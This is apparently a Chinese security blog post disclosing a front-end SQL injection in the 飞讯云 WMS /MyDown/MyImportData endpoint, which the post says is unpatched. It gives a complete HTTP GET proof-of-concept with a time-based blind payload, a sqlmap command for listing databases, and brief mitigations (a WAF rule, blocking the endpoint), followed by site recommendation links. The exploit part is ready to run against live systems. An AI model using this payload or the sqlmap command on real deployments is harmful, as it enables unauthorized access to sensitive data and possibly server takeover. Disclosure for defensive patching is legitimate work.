【飞讯云MyImportData前台SQL注入已复现】

一、漏洞简介

飞讯云-WMS 接口:/MyDown/MyImportData?opeid=1处存在前台SQL注入漏洞,攻击者可以通过sql注入攻击获取到敏感数据,账号信息等,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

二、poc利用

GET /MyDown/MyImportData?opeid=1%27+WAITFOR+DELAY+'0:0:10'-- HTTP/1.1
Host: {host}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: language=zh-CN; ASP.NET_SessionId=fszg0ra1zc3tgeepea3p4ujz
Connection: close

sqlmap验证:

python sqlmap.py -u http://xxxx.xxx.xxx:8080/MyDown/MyImportData?opeid=1 -p openid --dbs

三、临时措施

厂商未发布补丁,建议:

1、waf设置规则防护

2、禁止对/MyDown/MyImportData?opeid=1接口的访问

相关推荐
Tipray200622 分钟前
天 锐 蓝盾终端安全管理系统:办公U盘拷贝使用管控限制
安全
坚定信念,勇往无前4 小时前
Spring Boot 如何保证接口安全
spring boot·后端·安全
H轨迹H4 小时前
Vulnhun靶机-kioptix level 4-sql注入万能密码拿到权限ssh连接利用mysql-udf漏洞提权
网络安全·渗透测试·vulnhub·靶机·web漏洞·oscp
数造科技5 小时前
紧随“可信数据空间”政策风潮,数造科技正式加入开放数据空间联盟
大数据·人工智能·科技·安全·敏捷开发
winfredzhang5 小时前
Python实战:Excel中文转拼音工具开发教程
python·安全·excel·汉字·pinyin·缩写
网安加云课堂5 小时前
课程分享 | 安全系统建设的挑战与解决方案
网络·安全·web安全
源码宝6 小时前
医院安全(不良)事件上报系统源码,基于Laravel8开发,依托其优雅的语法与强大的扩展能力
安全·不良事件上报·医院不良事件管理
海域云赵从友6 小时前
助力DeepSeek私有化部署服务:让企业AI落地更简单、更安全
人工智能·安全
黑客Ela7 小时前
网络安全营运周报
网络·安全·web安全
jingwang-cs7 小时前
内外网隔离文件传输解决方案|系统与钉钉集成+等保合规,安全提升70%
安全·中间件·钉钉·安全架构